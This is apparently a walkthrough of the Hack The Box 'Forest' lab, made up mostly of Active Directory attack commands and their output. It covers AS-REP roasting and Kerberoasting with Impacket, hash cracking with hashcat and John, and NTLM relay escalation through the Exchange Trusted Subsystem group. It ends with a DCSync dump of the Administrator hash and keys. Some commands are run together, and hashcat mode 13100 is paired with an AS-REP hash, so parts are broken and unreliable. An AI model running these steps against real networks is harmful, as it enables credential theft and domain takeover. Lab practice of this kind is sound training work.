LDAP normally provides verbose information about the AD. And if anonymous bind is allowed, we can query many of good AD information, such as user information.
Identify Kerboros Service Principal Names (SPN) tight to the account using Impacket's GetSPN
# list SPNs tight to accountimpacket-GetUserSPNs -dc-ip <IP><Domain/accountName># ticket to crackimpacket-GetUserSPNs -dc-ip <IP><Domain/accountName>--requestthe response contains kerberos hash which can be cracked offlien with hashcat or john
impacket-GetNPUsers htb.local/svc-alfresco -no-pass -dc-ip 10.129.95.210
# store it into file: svc_hash
$krb5asrep$23$svc-alfresco@HTB.LOCAL:ffe734482ed68633483d56361f5fb53e$1e56eced31d90377e3ed00ad0ee02238daa7a06be902100b62ceb6134143c991ab99f42f276fd1d8d5aca0c8e0eeed4bac11b3b2dbc2a2575f5dd73dc9d3c9e25c1371ef7b36a0d3356303ea7b99c1e45d4ff17b25c821a302cc03db11db9a7e1a434a6a676785867472c9f02e8206e275f06e93fba7060bb5d1577d796748518cac9ffad084f8b7ef852f3b18db2b4cd231e1ec3e6a8ea8934842bedb379f5d04a72984c53a18716cddf4c2529d493dfb552d9ae47d99ec0cac30c692de42450eb2ae9ed08688f198f8edddf0ababfdd57dafc40ed02c69361219f294fc039082ccfc1e94a1
Hashcat - Cracking Kerberos ticket
hashcat -m 13100 -a 0 svc_hash passwordlist.txt --force --show
Johne The Ripper - Cracking Kerberos ticket
john --wordlist=/usr/share/wordlists/rockyou.txt ./svc_hash
Abusing privileges of "Account Operators" see bellow in BloodHound inspection we continue with the privilege escalation by adding new user using DSYNC attack.
DSYNC Attack thhrough - Exchange Trusted Subsystem group
Create domain account
PS C:\> net user bigb0ss bigb0ss /add /domain
PS C:\> net group "Exchange Trusted Subsystem" bigb0ss /add /domain
PS C:\> net user bigb0ss /domain
Impacket NTLM Relay
Impacket’s ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).
# kali terminal1cd /usr/share/doc/python3-impacket/examples/./ntlmrelayx.py -t ldap://10.129.95.210--escalate-user bigb0ss
DSYNC attack - Dump Administrator LM/NT hash
# kali terminal2secretsdump.py htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administrator
# kali terminal2impacket-secretsdump htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administratorImpacket v0.10.0- Copyright 2022 SecureAuth Corporation[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Using the DRSUAPI method to get NTDS.DIT secretshtb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::[*] Kerberos keys grabbedhtb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375htb.local\Administrator:des-cbc-md5:c1e049c71f57343b[*] Cleaning up...